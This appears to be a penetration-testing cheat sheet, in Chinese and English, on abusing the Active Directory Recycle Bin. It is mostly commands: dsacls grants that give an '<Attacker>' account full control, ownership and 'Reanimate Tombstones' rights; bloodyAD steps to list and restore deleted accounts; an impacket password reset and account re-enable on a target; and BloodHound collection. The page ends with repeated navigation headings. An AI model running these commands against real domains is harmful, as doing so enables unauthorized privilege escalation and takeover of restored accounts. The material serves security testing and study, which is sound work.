Active Directory Recycle Bin

Active Directory - Recycle Bin ¶

Details ¶

Deleted objects have a default retention time of 180 days
Recycle Bin path: CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=example,DC=com

Enable Active Directory Recycle Bin in PowerShell

Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=<Domain>,DC=<Domain>' -Scope ForestOrConfigurationSet -Target '<Domain>'

# Example
Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=sec,DC=lab' -Scope ForestOrConfigurationSet -Target 'sec.lab'

授予域用户对已删除对象容器的权限 ¶

微软官方文档中定义的常见权限缩写包括：

GA：Generic All
GR：Generic Read
GW：Generic Write
GX：Generic Execute
RP：Read Property
WP：Write Property
CC：Create Child
DC：Delete Child
LC：List Children
DT：Delete Tree
LO：List Object
SD：Delete
RC：Read Control
WD：Write DACL
WO：Write Owner

对照表格

权限代码	权限名称	说明	常见特定属性/场景 (WP/RP/CA)
GA	Generic All	完全控制	包含所有权限
GR	Generic Read	通用读取	读取所有属性及权限
GW	Generic Write	通用写入	修改所有属性
GE	Generic Execute	通用执行	读取并列出内容
SD	Delete	删除	删除当前对象
DT	Delete Tree	删除树	删除对象及其所有子对象
RC	Read Control	读取安全性	读取对象的权限列表 (ACL)
WD	Write DACL	写入安全性	修改对象的权限列表 (ACL)
WO	Write Owner	修改所有者	更改对象的所有权
LC	List Contents	列出内容	查看容器下的对象名称
CC	Create Child	创建子项	在容器内新建对象 (如新建用户)
DC	Delete Child	删除子项	删除容器内的子对象
RP	Read Property	读取属性	`RP;memberOf` (读取组成员)
WP	Write Property	写入属性	`WP;servicePrincipalName` (修改SPN) `WP;userAccountControl` (修改账户状态)
CA	Control Access	扩展权限	`CA;Reset Password` (重置密码) `CA;Replicating Directory Changes` (DCSync)
SW	Self Write	验证写入	`SW;publicInformation` (修改个人信息)

# 授予对应 CN 或者 OU CC (Create Child)权限
dsacls "CN=Users,DC=<Domain>,DC=<Domain>" /G "<Domain>\<Attacker>:CC"

# 授予对用户的写权限
dsacls "CN=<Target>,CN=Users,DC=<Domain>,DC=<Domain>" /G "<Domain>\<Attacker>:GA"

# 授予所有权
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /takeownership

# 赋予恢复权限
dsacls "DC=<Domain>,DC=<Domain>" /G "ZZ:CA;Reanimate Tombstones;"
# 赋予恢复权限
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "ZZ:CA;Reanimate Tombstones;"

# 授予：列出、可读、可写权限
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:LC"
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:RP"
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:WP"
# Or
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:LCRPWP"

恢复后的处理

# 重置密码
impacket-changepasswd -altuser <Attacker> -altpass <Password> -newpass <New Password> -reset <Domain>/<Target>@<IP>

# 启用账户
bloodyAD -u <Username> -d <Domain> -p <Password> --host <IP> remove uac <Target> -f ACCOUNTDISABLE

# 信息收集
bloodhound-python -c All -u <Username> -p <Password> -d <Domain> -ns <IP> -dc <DC> --zip --dns-tcp

bloodyAD ¶

Insatll from github:

# https://github.com/CravateRouge/bloodyAD
python3 -m venv /path/venv
source /path/venv/bin/activate
# Install
pip install bloodyAD
# Or
git clone --depth 1 https://github.com/CravateRouge/bloodyAD
pip install .

Restore Objects ¶

Requirements:

Restore Tombstoned right on the domain object
Generic Write right on the deleted object
Create Child right on the OU used for restoration

By default, only Domain Admins are able to list and restore deleted objects.

On restoration some objects retains attributes:

Deleted objects retain all their attributes (including sensitive ones)
Tombstoned objects retain most important attributes

Exploitation:

# 判断是否开启域回收站
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get search -c '1.2.840.113556.1.4.2064' --resolve-sd --attr nTSecurityDescriptor --base 'CN=Deleted Objects,DC=sec,DC=org' --filter "(objectClass=container)"

# 查询权限是否符合要求
# 不需要再使用参数查看被删除的用户，默认查询包括被删除的用户
# --exclude-del  if set, exclude deleted objects (default: False)
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get writable

# 列出被删除的对象
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get search -c '1.2.840.113556.1.4.2064' --filter '(isDeleted=TRUE)' --attr name,objectSid

# 查看是否有权限恢复
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get object 'DC=sec,DC=org' --attr nTSecurityDescriptor --resolve-sd

bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get search -c '1.2.840.113556.1.4.2064' --filter '(&(isDeleted=TRUE)(sAMAccountName=<Name>))' --attr nTSecurityDescriptor --resolve-sd

bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get object 'CN=Users,DC=sec,DC=org' --attr nTSecurityDescriptor --resolve-sd

# 恢复被删除的对象
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> set restore <Target Name/SID>

Active Directory Recycle Bin

Active Directory - Recycle Bin¶

Details¶

授予域用户对已删除对象容器的权限¶

bloodyAD¶

Restore Objects¶

Active Directory - Recycle Bin ¶

Details ¶

授予域用户对已删除对象容器的权限 ¶

bloodyAD ¶

Restore Objects ¶